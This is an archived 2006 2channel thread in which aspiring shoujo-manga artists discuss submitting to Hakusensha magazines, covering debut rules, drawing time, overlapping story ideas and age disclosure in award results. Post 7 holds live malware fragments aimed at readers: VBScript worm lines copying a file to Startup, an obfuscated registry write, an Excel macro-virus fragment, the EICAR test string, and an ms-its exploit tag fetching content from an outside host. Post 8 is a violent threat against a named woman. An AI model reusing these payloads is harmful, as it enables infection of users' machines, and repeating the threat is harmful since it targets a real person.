2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆◆◆白泉系雑誌投稿者12◆◆◆

1 :花と名無しさん:2006/12/10(日) 20:08:53 ID:???0
ここは花とゆめ・ララ・メロディの『投稿について』語るスレです。
『投稿者について』語るスレではありません。
サイト晒し・公式発売日前のネタバレ禁止。

お約束とよくある質問・過去ログは>>2-5辺り。
雑誌を見ればわかる質問は基本的にスルーで。

※新スレは980を踏んだ人が立てて下さい。

<前スレ>
◆◆◆白泉系雑誌投稿者11◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1160629484/

2 :花と名無しさん:2006/12/10(日) 20:10:07 ID:???0
・雑誌や応募要項を見てわかる事はまず自分で調べましょう
・デビュー後のお金の工面や具体的な数字の話題は
 総合の投稿スレかサロンや各専門スレでして下さい

・よくある質問  
 【花夢とララのデビュー形式】(例外も有り)
 ◆花夢
  HMC1位受賞→雑誌掲載はされるが未デビュー
  BC・アテナで受賞→雑誌掲載はされるが未デビュー
              その次の掲載作品がデビュー作
 ◆ララ
  LMS1位受賞→雑誌掲載はされるが未デビュー
  LMG・アテナで受賞→受賞作が掲載でデビュー
   (LMS以外は稀に花夢と同じデビュー形式の場合もあり)

 ◆メロディ
   銅賞以上でデビュー。受賞作=デビュー作

 【原稿返却の早さ】 ララ&メロディ:1〜2ヶ月>花:1ヶ月〜半年
 【批評の丁寧さ】  花>ララ (メロディは一次審査通過者のみ電話批評あり)
 【応募要項見本って】
  内容が書かれていればオケ。枠線も必要なし?
  移動教室や原稿返却時に応募シートをもらえたりする。


3 :花と名無しさん:2006/12/10(日) 20:12:21 ID:???0
Q:大きい漫画賞の次回募集(締め切り)はいつ?
A:LMG年3回・BC年2回・アテナ年1回。
  締切日と詳細はその都度雑誌を買って調べましょう

Q:受賞連絡はいつ来る?
A:雑誌発売日の前と後、両方に報告例有。受賞コメントの有無、
  担当の有無やどの漫画賞かによってその時々でかなりかわるので
  いつまでに連絡来なかったらアウト云々という判断は意味なし。
  (連絡まだかないつかな語りはチラ裏へ)

Q:アテナ一次通過者なのに移動教室招待が来ない
A:招待人数には限界があります。在住地域とその年のレベルや投稿暦などに
  左右されるので招待は「絶対」ではありません。
  一次通過はあくまで優先招待目安程度と考えましょう。

Q:移動教室一般参加枠申し込みの結果がわかるのはいつ?
A:ララは結果に関係なく通知有。花夢は参加OKの時のみ通知有

Q:デジタル漫画OK?
A:OK。見本としてプリントアウト原稿と元データ(CD-ROMやMO)同封。
  それ以上の詳細は編集部に電話で聞きましょう。

Q:投稿は郵便以外でもOK?
A:宅急便でもOK

Q:ララと花夢どっちがいいと思う?
A:自分で判断しろ


4 :花と名無しさん:2006/12/10(日) 20:14:20 ID:???0
<過去ログ>
■□■白泉系雑誌投稿者■□■
http://comic.2ch.net/gcomic/kako/1009/10099/1009917181.html
◆◆◆ 白泉系雑誌投稿者2 ◆◆◆
http://comic.2ch.net/gcomic/kako/1028/10283/1028302599.html
◆◆◆白泉系雑誌投稿者3◆◆◆
http://comic.2ch.net/test/read.cgi/gcomic/1051449445/
◆◆◆白泉系雑誌投稿者4◆◆◆
http://comic2.2ch.net/test/read.cgi/gcomic/1066062030/
◆◆◆白泉系雑誌投稿者5◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1081512539/
◆◆◆白泉系雑誌投稿者6◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1096298849/
◆◆◆白泉系雑誌投稿者6◆◆◆ (※実質 7代目)
http://comic6.2ch.net/test/read.cgi/gcomic/1105932677/
◆◆◆白泉系雑誌投稿者8◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1124782177/
◆◆◆白泉系雑誌投稿者9◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1135754247/
◆◆◆白泉系雑誌投稿者10◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1147664017/

5 :花と名無しさん:2006/12/10(日) 21:14:28 ID:???0
http://01sale.web.fc2.com/book-comic-sale.html

6 :花と名無しさん:2006/12/10(日) 21:37:20 ID:???0
おTUKArei

一発変換。

7 :<body onload=window()>:2006/12/10(日) 22:30:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2006/12/10(日) 23:54:49 ID:g44r1Opr0
近藤多喜子
顔面をバットでふっ飛ばしたい
眼球飛び出したところを
踏み潰す
もう限界



9 :花と名無しさん:2006/12/11(月) 00:00:04 ID:???0
私怨キモス

10 :花と名無しさん:2006/12/11(月) 01:26:11 ID:???O
華麗なスレ立てに>>1乙
テンプレ改変もサンクス!

11 :花と名無しさん:2006/12/11(月) 14:45:05 ID:???O
即死回避〜

12 :花と名無しさん:2006/12/11(月) 17:20:55 ID:???0
今月のLMS発表だ。
ドキドキ。

13 :花と名無しさん:2006/12/12(火) 10:08:39 ID:???0
前スレの最後らへんで話題になってたけど
自分の絵がデッサン狂ってるかどうかすごい気になってきた・・・
左右反転させても見れる絵だったら狂ってないよね?

14 :花と名無しさん:2006/12/12(火) 10:24:01 ID:???0
>>13
デッサンと左右反転は全くの別物だと思われ
例えば手の大きさが顔よりうんと小さかったりしたら左右反転してきれいでもデッサンできてないってことでしょ

15 :花と名無しさん:2006/12/12(火) 11:33:03 ID:???O
顔よか体が難しい。立ってる人を描くと体が下に向けて傾くorz
裏から透かして真っ直ぐなるよう訂正してます。

16 :花と名無しさん:2006/12/12(火) 14:03:02 ID:???O
先日、花に持ち込んだら「素直な作風だね」と褒められた。(もちろん注意もされた)
んで、日を改めて同作品でララに持ち込んだら
「ファンタジーやファンタジー入った学園モノとかを描く気は無いの?」
…と聞かれたよ。同じ白線でも毛色が違うんだなぁと思った。

17 :花と名無しさん:2006/12/12(火) 16:11:34 ID:???O
つ編集にもよる

てかその2つのセリフでは毛色の違いと言うのが表れてないような気がして悩んだ

18 :16:2006/12/12(火) 17:52:59 ID:???O
>>17
ごめん。身バレが怖くてかなり端折った。
まず私は普通の恋愛モノを描いて持ち込んだ。
花・ララ編集共に普通に批評。
で、投稿者であり熱心な読者である私は、批評後に少し雑談をさせて貰った。
その批評〜雑談の話を踏まえて毛色が違うんだと感じた。
確かに編集にもよるけど、少なくともララは雑誌の方針として
ファンタジー(アニメ化)を視野に入れた作品を求めてると思った。
まぁそう言う作品を投稿作にも求めてるかは別としてもね。
(会話の具体的な中身は端折ります。前レスの軽い補足って事で)

19 :花と名無しさん:2006/12/12(火) 18:00:58 ID:???0
>>18
ちなみに、花はどんな作品を求めてると感じた?
身バレしない程度でいいので教えてホスィ

20 :花と名無しさん:2006/12/12(火) 18:26:20 ID:???0
LALAの移動教室では特にファンタジー云々はなかったなぁ。
とにかく面白くて、女子中高生あたりが楽しめる作品なら
なんでもあり、って感じだった。
「とにかく面白ければ」が難しいんだけどw


21 :花と名無しさん:2006/12/12(火) 19:55:03 ID:???0
ホスト部であてて、アニメ化の美味しさに
あらためて眼をつけたのかもね。
アニメ化となるとヲタ層タゲになるから
普通の学園ラブコメみたいなのより、
ファンタジー要素入ったものの方が
需要高いのかもしれない。
まあホスト部は学園ラブコメだったけど…

22 :花と名無しさん:2006/12/13(水) 01:15:03 ID:???O
えっ
ホスト部ってファンタジーじゃないの ?

23 :21:2006/12/13(水) 02:27:18 ID:???0
広義ではファンタジーかもしれないけれども
遥かとかフルバみたいな
あからさまな非現実要素はなかったので。

24 :花と名無しさん:2006/12/13(水) 02:39:30 ID:???0
「漫画自体がファンタジー」ともいうしね…

25 :花と名無しさん:2006/12/14(木) 01:16:34 ID:???0
そういえばもうすぐ「少女まんが家になろう」って本が出るらしいけど、買う人いる?

26 :花と名無しさん:2006/12/14(木) 01:32:01 ID:???0
買ってみようと思ってるけど、書店で買うのはさすがに恥ずかしいから
何かのついでにネットで買うつもり。

27 :花と名無しさん:2006/12/14(木) 07:12:10 ID:???0
「めざせデビュー」といい・・・
わかりやすいのはいいけれど
レジに持ってくのがちょっと
ためらわれるタイトルばかりだよね・・・。

28 :花と名無しさん:2006/12/14(木) 07:25:45 ID:???0
アマゾンとかセフンアンドワイで買えば?

29 :花と名無しさん:2006/12/14(木) 10:04:21 ID:???0
送料がネック!

30 :花と名無しさん:2006/12/14(木) 11:18:23 ID:???0
セブン〜は送料かからないよ?
全国のセブンで受け取れるし、お金はその場で払うし。

31 :花と名無しさん:2006/12/14(木) 12:35:35 ID:???0
>30
買うのを見られるのが恥ずかしいからネットで買うのに
セブン取りに行ったら意味ないじゃんw

32 :花と名無しさん:2006/12/14(木) 12:41:09 ID:???0
>>31
ちゃんと中見えない袋に入ってる

自分はいつもアマゾンとセブンアンドワイと楽天ブックスの中から
その日の気分で選んで使ってるw

33 :花と名無しさん:2006/12/14(木) 12:59:57 ID:???O
うんうん。セブン受け渡しのやつはかなり楽だし安全。
本もCDもゲームも…かなり世話になってる

微妙にスレチか?ごめん

早く次の作品とりかかろう…

34 :31:2006/12/14(木) 19:03:08 ID:???0
>32 >33
知らなかった 無知でごめん…orz
それは便利だな いいこと知った!
ありがとう

35 :花と名無しさん:2006/12/14(木) 19:07:15 ID:???0
>33
次の作品頑張れ!

社会人している人に質問
毎日仕事行って大体何時から何時くらいまで何時間
漫画に使ってる?

自分も社会人なんだけど、いまいち時間の使い方がへたで
作品が思うように完成できない orz

36 :花と名無しさん:2006/12/14(木) 20:17:22 ID:???O
自分も社会人、最近睡眠時間を4時間に削ってやってる
が仕事に頭がまわらなくなってきた、マンガも思うように
進まないし、休みは爆睡でつぶれるし。

37 :花と名無しさん:2006/12/14(木) 22:42:44 ID:???0
>35
会社のすぐ近くに引っ越した。
計算すると、徹夜とか入れずに
一ヶ月に300時間は漫画に使える。
でも実質へたれてしまったり
何かと用事が入ったりして、
そのとおりにはいかないけれども。

38 :花と名無しさん:2006/12/15(金) 00:00:22 ID:???0
私の場合、片道一時間ほどの移動時間につらつら考えたり
なんか読んだり見たり聞いたりしたものが
結果ネタになるケースが多いので、むしろ貴重なネタ作りタイムだw

39 :花と名無しさん:2006/12/15(金) 01:08:57 ID:???0
高校生の会話とかって、一旦大人になってしまうと
教師でもない限り縁遠くなっちゃうから
電車や駅でのリア高生の観察が重要になってくるんだよねw

40 :花と名無しさん:2006/12/15(金) 11:43:33 ID:???0
平日は4時間描ければいいほう。
残業とかあると、夜の0時やら1時から執筆始めるのが現実★
で、大体3時くらいまで。
追い込みのときは4時や5時まで描いてるよ(ちなみに7時半には出勤)。
これが2週間続いたときはさすがに死んだ。
でも慣れるもんだよ。。

41 :花と名無しさん:2006/12/15(金) 19:32:13 ID:???0
35です。皆レスありがとう

37>
自分も平均睡眠時間3〜5時間。ひどいときは1:30とか…
でも同じく進まないし週末爆睡してしまうよ orz
睡眠ちゃんととらないと返って能率下がるのかもしれない…

38 39>
通勤電車なのうらやましい
自分は車通勤だから平日は会社と家を往復するだけ
本屋とかには行くようにしてるけどやっぱりどうしても世界が狭い
最近無性に都会に出たいよ

40>
残業あるのは大変だよね
幸い自分は残業はほとんどない職場なんだけど、
週末アシで一ヶ月丸ごと休み無しみたいな状況になったときは
死ぬかと思った。。。

やっぱり皆頑張ってるんだね
自分も頑張ろうと思ったよ ありがとう

42 :花と名無しさん:2006/12/15(金) 19:43:49 ID:???0
ごめん 37>じゃなくて36>だった
そして37へのレスも忘れてた ごめん

37>
自分も意外と時間あるのにヘタレてしまう
用事入ったりして一日間を置くともうダメ しばらく描けなくなる

最近の自分はすごい漫画家になることへの情熱が欠けてる気がする
昔は食事の時間すら惜しいほどだったのに何が違うんだろう?
学生の頃と違って中途半端にお金があるのがいけないのだろうか

いろいろ頭で考えてしまうけど、結局自分の作品や実力に自信がないから
手が進まなくなること実は気付いてる
皆見習って自分も頑張るよ
独白に近いことばかり書いてごめん

ところでBC受賞作読んだ?
藤緒さんの雰囲気かわいくて好きだったな
自分もファンタジー志望だから嬉しい

43 :花と名無しさん:2006/12/15(金) 19:49:03 ID:???0
レスは>>を数字の前につけるといいよー

社会人に限らず、1作(16P)描くのに合計何時間くらいかかるか気になる
記録してないとわかんないかなw

44 :花と名無しさん:2006/12/15(金) 20:03:45 ID:???0
>>43
ありがとう 覚えたっ!
どこかで数字リンクのは板が重くなるって読んでちょっと気にしてた
これから使うねー

確かに日数じゃなくて時間だとわからないかもねw
ものすごい几帳面な人じゃないと無理かも

日数、プロもプロ志望も誌面とかで描く早さ見る度に描くの早くて焦るよ
でも意外と日数だとまちまちだけど、時間数にすると
あまり変わらなかったりして……なんてささやかな希望w

45 :花と名無しさん:2006/12/15(金) 20:23:54 ID:???0
愚痴。
ある新人さんの作品が、
以前自分が担当さんに出した作品と
設定・展開がモロかぶっててorz・・・・。
雑誌違うし、偶然ありえない程のカブり方じゃないから
パクとかだとは思わないけど、
かなり特殊な設定だから
もう白線系では二度とこのネタ使えねー・・・。
昔からすごく気に入ってて、
いつか絶対リメイクして出してやろうと思ってから
相当凹んだ・・・。

46 :花と名無しさん:2006/12/16(土) 00:47:52 ID:???O
特殊設定とかいうけど最近載ってた新人全部一応みてるけど
どれもこれも同じで抜き出た特殊なんかなかったと言っておくよ

47 :花と名無しさん:2006/12/16(土) 00:50:30 ID:???0
寺の覗きは結構な特殊設定だったとオモ

48 :花と名無しさん:2006/12/16(土) 01:06:00 ID:???O
ていうかあんまおもしろくなかったからスルー

49 :花と名無しさん:2006/12/16(土) 02:09:15 ID:???0
>47
特殊というか、なんか主人公独り言多いストーカーぽくてマジキモかったよ
>45はそういうのかかないでクレ

50 :45:2006/12/16(土) 08:17:13 ID:???0
覗きの話ではないですw
確かにものすごく個性的とかじゃないけど、
料理の仕方で別作品に見せられるほど
汎用性高い設定でもないので当分諦めてる・・・。
(少なくともどの作品かここで言って、
もし当時の担当さんがここ見ていたら
即身バレする程度には似ている)
担当さんも設定だけはすごく面白いって言ってくれて
昔から応援してくれてる友達も、あの作品が一番好きだから
いつか掲載されるようがんばってって言ってくれてたのに・・・。
力不足ってことで次ガンガルよ・・・。



51 :花と名無しさん:2006/12/16(土) 08:44:49 ID:???0
>>45
そういうの切ないけど、その作品を越えるような面白い作品描いて
見返すしかないよね。その新人さんも
(その当時そのネタで掲載させてくれなかったであろう)担当さんも。
悔しいだろうけど、頑張れ!!

自分も小学生の頃からあたためていたキャラクターにそっくりなモチーフが
最近大人気アニメになっててちょっと凹んだ…
でもよく考えると小学生のときに考えたキャラ自体が何かのパクリだったので
どちらにしろ使えなかったことを思い出したw

52 :花と名無しさん:2006/12/16(土) 16:20:11 ID:???0
逝ける!!と思って作ったネタそっくりの話が載るって経験あるあるw
あたしの場合は誰でも思いつくありふれたその程度のアイデアだったかorzって感じ
でもくやしいね
つか、もう漫画のネタ出尽くしてるからネタ探し難しい

53 :花と名無しさん:2006/12/16(土) 18:14:31 ID:???0
アテナ発表まであと3日(2日?)だーワクテカする。

54 :花と名無しさん:2006/12/16(土) 18:43:13 ID:???0
>>49
投稿者が受賞者の作品貶すのって妬みにしか見えないよ。
本誌スレでも好評だと、なおさら。
それを超えていこうって気持ちは大切だけどさ。

55 :花と名無しさん:2006/12/16(土) 19:41:54 ID:???0
覗きの話本誌スレで好評なんだね!かなり斬新な設定だったもんね!
(16Pだからしょうがないけど)終り方がくっつくところまで読みたい!
とは思ったけど自分も何か好きだったな。
ファンタジー設定なしの恋愛ものでああいう読んだことない感じなのを
発想できるのって、ほんとすごいと思った

どんなに他人の作品読んでいろんな意味でちくしょーって思っても、
そういう気持ちを晴らすにはそれよりもいい作品描くしかないと思う

56 :花と名無しさん:2006/12/17(日) 02:16:42 ID:???0
>>55
あの話40pあったぞ?

57 :花と名無しさん:2006/12/17(日) 02:29:27 ID:???0
なんか、思いつく話話よくよく考えると既存のと被ってると言えば被ってる?って感じで怖い
パクとか気にしだしたら何も描けなくない?
もう既に世の中に漫画ありふれすぎておいしいネタは食い尽くされてるんだもん

58 :花と名無しさん:2006/12/17(日) 02:41:12 ID:???0
>54
それ2ちゃんばっかみてるやつらの一部意見じゃない
本スレにかかれてることが全てだとは思わないな
投稿者や2では好評でも対象年齢である中高生のような若い感性に
マジでこれ受けてるの?と本気で聞きたいくらいだ

それで次作でこけたらボコボコに叩くのが2の慣例だから
端から見てて心配なほど最初っから妙な情報操作するのどうなのかと思うね

59 :花と名無しさん:2006/12/17(日) 02:47:40 ID:???0
情報操作って?

60 :花と名無しさん:2006/12/17(日) 03:10:36 ID:???0
ここでマンセーしまくること or 叩きまくること=情報操作、です
応援者や本人周辺者ならやめてあげてほしいと思うだけです。
相応の評価からかけはずれ常軌を逸したものほど
実は本人にとって迷惑なものは無い。
特に投稿者や新人の時点でというのが。

そういうの、
あなた自身の単独スレッドが立ったことがないからわからないでしょ?
本当に応援したいのならネット論争はせずアンケを送るとか
そういう方法でそっとあたためてあげておいてほしいです。

61 :花と名無しさん:2006/12/17(日) 03:16:51 ID:???0
それは情報操作とは言わないでしょ。
それに今回の話についてはマンセーしすぎてるとは思わないな。
改善点も指摘されてるし拒否反応意見も出てる。
あと完全なプロはまだしも受賞程度で叩きまくられてるのなんて、
パクリ疑惑くらいしか記憶にないんだけど…

62 :花と名無しさん:2006/12/17(日) 03:44:51 ID:???O
>>58
>>54は投稿者スレで投稿者が受賞作品を悪く言うのは
嫉みにしか見えないってことが言いたいんでしょ?
言いたいならこのスレじゃなく受賞者スレや本スレで言えばいいのに

ところで>>60は何かあったの?

63 :花と名無しさん:2006/12/17(日) 04:03:11 ID:???0
>ところで>>60は何かあったの?

何かお母さんみたいでワラタw


64 :花と名無しさん:2006/12/17(日) 08:25:40 ID:???0
>>56
40Pもあったのか…終り方の物足りなさが心に残ってしまって
すごい短いページ数でまとめたんだなーと勝手に解釈してしまった…orz

>>60
うん、ごめんね 全く周囲の人間とかじゃないんだけど
何か悪く言われているのを見たら少し書きたくなってしまった。
本当に単純に発想すごいと思ったから。
むしろ、ここ書いてるの投稿者なのに素直にすごいところ認めずに叩いてるのが
見るに耐えなかっただけかもしれない。ただの自分勝手だった。
そもそも、そういう感想を投稿者スレに書くの自体スレ違いだし
確かに本当に応援したければアンケとかだよね
(正直今回はアンケとか手紙出すほど応援したい気持ちはないけど…)

いろいろ気を付けるよ 皆もごめん

65 :花と名無しさん:2006/12/17(日) 08:34:29 ID:???0
受賞作品に対してどう感じようとそれは読者としては勝手だが、
受賞したりネーム選考通って掲載されたということは、
その作品には少なくとも(白泉の)編集でGOサインを出されるだけの
何かの要素が潜んでいることは確かだ。
投稿者なら妬んで叩くよりも、その作品の何が良かったのか、
受賞や掲載に値するものは何なのか、研究することの方が重要だと思う。

66 :花と名無しさん:2006/12/17(日) 10:33:46 ID:???0
自分も60に何があったのか気になる・・。
新人の段階で単独スレでもたって叩かれたのか!?
レスみると繊細な人のようだから
2ちゃんには来ないほうがいいと思う・・・。

67 :花と名無しさん:2006/12/17(日) 10:50:33 ID:???0
新人で知名度あげようとして、
自分で自分のスレたてて叩かれて、
過去にパクリで処分を受けた事もバレて
辞典スレでまとめられた新人いたね。


68 :花と名無しさん:2006/12/17(日) 11:18:07 ID:???0
>>64
いくらなんでも40Pを16Pと思い込むのはなぁ・・・
漫画描いてるならもっとページ数にシビアなほうがいいと思う

69 :花と名無しさん:2006/12/17(日) 11:25:24 ID:???0
64じゃないけど自分も16と思ってた・・・。
ここのレスみて、思わず数えなおしたよ・・・。

70 :花と名無しさん:2006/12/17(日) 13:30:00 ID:???0
>>67
これか
【ちよタソ】(ちよたん)a name="chiyotan"
 少女漫画板に自ら宣伝スレを立てた駆け出しの新人漫画家・岩下ちよの愛称。
 「モサヨの漫画はしっとりとしていて考えさせられる」などのアイタタ発言を連発し、スレ住人の反感を買ったりもしたが、
一方でちよタソを煽りながらもアドバイスをする住人も多く、意外にも良スレになる予感がしていた。
 そんな中、突然舞い込んだのが「ちよタソ盗作疑惑」。過去に「少コミ」誌でデビューした
「橘ヒカル」という名の新人漫画家の作品が講談社の某マンガの丸ごとパクリだった為、
小学館は「少コミ」に謝罪文を掲載、講談社に謝罪するなどの被害を被ったことがあった。
その橘ヒカルと ちよタソが同一人物ではないかという疑惑が浮上し、早速検証を始めたスレ住人にちよタソはブチ切れ。
「ちよと橘は違う人間だ」「訴えられたら怖い」等等の自作自演を繰り返し、
ホストがモロ見えなのに自作自演で削除依頼にも精を出したが管理人さんに無視される。
検証の結果、ちよタソと「少コミ」からあぼーんされた橘とは同一人物だと判明。
結局、ちよタソも盗作を認めて謝ったのだが、「当時の担当がチェックをしなかったから」「過去に捉われないで」などと、
盗作をした罪悪感を微塵も感じさせられない開き直り発言は周囲を呆れさせた。
 また、ちよタソは「M誌」に『あなたにダイビング』という素敵(wなタイトルで投稿もしており、スレ住人の笑いを誘った。
 タイトル通り、2ちゃんの雰囲気も読まずに2ちゃんにダイビングしたちよタソ。最後にちよタソは逆ギレしてスレを去り、
少女漫画板始まって以来の自爆スレだと囁かれている。また最近 ちよタソの中の人の動きも活発になってきていて、
「朝の連ドラ『ちゅらさん』を見て沖縄に逃亡疑惑」「ちよタソはマッチョ疑惑」等も浮上中。
ますます迷走する ちよタソから目が離せない状況だ。
 ちなみに、ちよタソの絵を見た人の話では、「小学生の絵だ」「ありえない場所から肩が生えてる」のだそうだ。


71 :花と名無しさん:2006/12/17(日) 13:55:13 ID:???0
16Pといえば、今回寺に載ってる緑川ゆきの漫画が16Pだね
最初読んだとき全然16Pだとは思わなくて、数えてみて吃驚した
連載の番外編とはいえ、16Pであんな内容に出来るのか…

72 :花と名無しさん:2006/12/17(日) 18:23:34 ID:???0
>>68
ものすごい気に入った作品だとページ数数えるんだけど
自分が描きたいものと掛け離れた作品だったので読んで感心しただけだった

ページ制限に合わせて描くのって本当に大変だよね
いつも(ページが)倍くらい必要なストーリーになってしまって困る
そういう技術も磨いていかないとなぁ
課題はいっぱいだ

73 :花と名無しさん:2006/12/18(月) 14:07:25 ID:???0
いよいよアテナ発表だね。
ゲッターさん、情報お願いします…!

74 :花と名無しさん:2006/12/18(月) 14:20:07 ID:???0
>>72
いつも、ページ数に見合う話内容なのかどうかの判断ができない。
プロットを作れないのが悪いんだとは思うけど、
すごく時間かけてコンテきって、
ようやくこのP数でこの話は無理ということに気付くorz。
内容とは別に話を進めるペースみたいなものもあるだろうし、
(わずかな内容を丁寧にページ使って見せる人もいれば
詰め込みすぎくらいの内容をうまく見せる人もいるし…)
難しいなぁ。

75 :花と名無しさん:2006/12/18(月) 14:30:08 ID:???0
>>73
クレ厨1嫁

76 :花と名無しさん:2006/12/18(月) 14:48:29 ID:???0
>>75
ごめん、発売日勘違いしてた。
もう一日我慢します。

77 :花と名無しさん:2006/12/18(月) 15:22:07 ID:???0
いや発売日過ぎたら尚更
ここでたからず本屋で買えよ

78 :花と名無しさん:2006/12/18(月) 15:35:01 ID:???0
>>1
>雑誌を見ればわかる質問は基本的にスルーで。

79 :花と名無しさん:2006/12/18(月) 15:40:31 ID:???0
>>77
いちいちからむなよ。


80 :花と名無しさん:2006/12/18(月) 15:47:50 ID:???0
まあアテナについてはバレは毎年やってることだけど
熱くならず落ち着いて待て
以下スルーでどぞ

81 :花と名無しさん:2006/12/18(月) 16:15:57 ID:???0
>>79-80
おまえらが一番スルーできてないしw

82 :花と名無しさん:2006/12/18(月) 16:16:13 ID:???0
少女まんが家になろう!買った人いる?
明日買う予定なんだけど、どんな感じなんだろう。

83 :花と名無しさん:2006/12/18(月) 16:23:36 ID:???0
そんなん出るんだ。
何年か前にもプータオみたいな名前の
似たような雑誌白泉から出てたね。

84 :花と名無しさん:2006/12/18(月) 16:59:19 ID:???0
漫画の描き方本は世の中いくらでもあるから
どの作家がどの画材や紙使ってるかとか
ちょくちょく本誌に紹介されてるやつを
まとめたの見てみたい。

85 :花と名無しさん:2006/12/18(月) 18:17:14 ID:???0
雑誌で新人さんたちが一年交代くらいでやってる、漫画の描き方講座を
単行本にまとめてくれたら絶対買うんだけどなあ…
いまや売れっ子の人とかもやってたりするしさ。
自分はララの、いなだ詩穂さんのやつ、いまだにとってある。

86 :花と名無しさん:2006/12/18(月) 22:33:39 ID:???0
>>82
買っちゃった♪
意外と(・∀・)イイ!
他のと違って文章が多いんだけどなんかそれがいいっていうか
つか、清水玲子顔晒さないでくれたほうが良かったのに。。。

87 :花と名無しさん:2006/12/18(月) 22:38:14 ID:???0
今回のアテナ、年齢も発表されてるらしいw

88 :花と名無しさん:2006/12/18(月) 23:07:07 ID:???0
うわぁ。
フェイントかよw

89 :花と名無しさん:2006/12/18(月) 23:08:08 ID:???0
そんな…何でいきなり発表形態変えるんだよorz

90 :花と名無しさん:2006/12/18(月) 23:09:00 ID:???0
嘘?

91 :花と名無しさん:2006/12/18(月) 23:23:28 ID:???0
マジだよ。ちなみにHMCも。

92 :花と名無しさん:2006/12/18(月) 23:57:35 ID:???0
ララも、ここ数ヶ月は年齢どころか出身地も載せてなかったけど(一位のみ)
一月号からまた復活したね。

93 :花と名無しさん:2006/12/19(火) 00:03:37 ID:???0
けっこう年齢いってる自分には
唯一救いのアテナがついに年齢発表し出したのか。
あぁショックでかい

94 :花と名無しさん:2006/12/19(火) 00:24:31 ID:???0
そんなに気になるなら、応募のときに年齢書かなければいいんじゃないかな?
書いてあろうがなかろうが受賞には関係ないよ。

95 :花と名無しさん:2006/12/19(火) 05:16:20 ID:???O
経歴、知名度、画力と年齢のバランスはどうか
十代を過ごした時期が読者と近いか、読者が共感出来るか
将来性はあるか
数年後体力的に問題ないか
高齢ニートをデビューさせたら社会に悪影響を与えないか
…と、大いに関係あると思うけどな年齢
関係ないならおまけスペースで自分語りをさせる訳がない

アテナもララも年齢公開に直したのは、
作者の年齢知らないと読者が不安になるからか?
ヨレヨレのお婆ちゃんが描いてたら読んでて疲れるとか
何者とも分からない作者が共感出来ねーとか
同じペーペーで面白いなら本人に売りのない二十代よりも
十代や人妻や医学生や美術分野出身者の方が関心あるとか
色々ありそう

96 :花と名無しさん:2006/12/19(火) 07:29:08 ID:???O
「少女まんが家になろう!」本文が164ページと薄いのに税込み590円もする…。花とゆめコミックスは180ページないと刷れないと思ってた。(花とゆめコミックス「スペシャル」扱いだからできた技?)
各作家の使ってる画材メーカーの紹介は、
プロの使ってるペン先のメーカーが12ページ目にちょこっと載ってるだけ。

97 :花と名無しさん:2006/12/19(火) 08:15:23 ID:???0
>>94,95
受賞には関係ないよ>年齢
受賞したあとで確認されることならある。
ただそれで受賞が取り消されることはないので、
年齢が気になる人は書かないでいいと思う。

まあ書いてない時点で20代後半以降?
くらいには思われると思うので、
20代の人は普通に書いててもいいと思う。

98 :花と名無しさん:2006/12/19(火) 09:01:24 ID:???O
あと2、3歳なら鯖読んでも平気だろ

99 :花と名無しさん:2006/12/19(火) 09:28:45 ID:???0
ちょっと疑問なんだけどもし年齢無記名の人が
受賞コメント有りのレベルの賞受賞したら
結果発表前に電話来るのは確実だよね?
その時編集に歳聞かれてそれがそのまま誌面に載るんじゃない?
今まででかい漫画賞で年齢欄空欄のままで
受賞してる人見かけた事ない。

100 :花と名無しさん:2006/12/19(火) 10:17:07 ID:???O
年齢書いてない=高齢
実際より上に思われるくらいなら、鯖読むか
正直に書いたほうがかえって安心ではないかな

101 :花と名無しさん:2006/12/19(火) 11:31:14 ID:???0
>99
審査段階で年齢が考慮される場合って、
かなり若いか、かなりオバか、
極端な場合じゃないかな。
10代半ばくらいなら将来性込みでアップしそうだし
30代以上なら即戦力レベルじゃないと難しそう。
20代なら、あまり年齢に左右されることはなさそうだ。

102 :101:2006/12/19(火) 11:32:08 ID:???0
ごめんレスの内容が全然>99じゃなかった。


103 :花と名無しさん:2006/12/19(火) 12:03:37 ID:???O
連載会議。誰を使うか?↓
24と21なら21に描かせよう

掲載歴のない27デビュー↓
この人に場数を踏ませてる暇があったら20にプッシュの金を費やそう

読み切りがつまらなくても連載で化ける人間もいるから
アンケだけで選ぶわけじゃなさそう

104 :花と名無しさん:2006/12/19(火) 12:23:08 ID:???0
24と21程度じゃ年齢差はないようなものだから問題ないよ
投稿で考慮される年齢って>>101にあるくらい極端な例だけ
ってなんか無限ループに陥りそうな予感…

105 :花と名無しさん:2006/12/19(火) 12:36:13 ID:???0
アテナ、前も年齢出てたことあるよね。
草凪さんのとき出てたよ確か。
前からファンだったからああ、このひと○歳年上なんだ、と思った記憶が。
でも最近出てなかったのに…どーん。

106 :花と名無しさん:2006/12/19(火) 12:53:58 ID:???O
年齢が出る結果発表で今まで
年齢欄が空欄だった人いないみたいだし
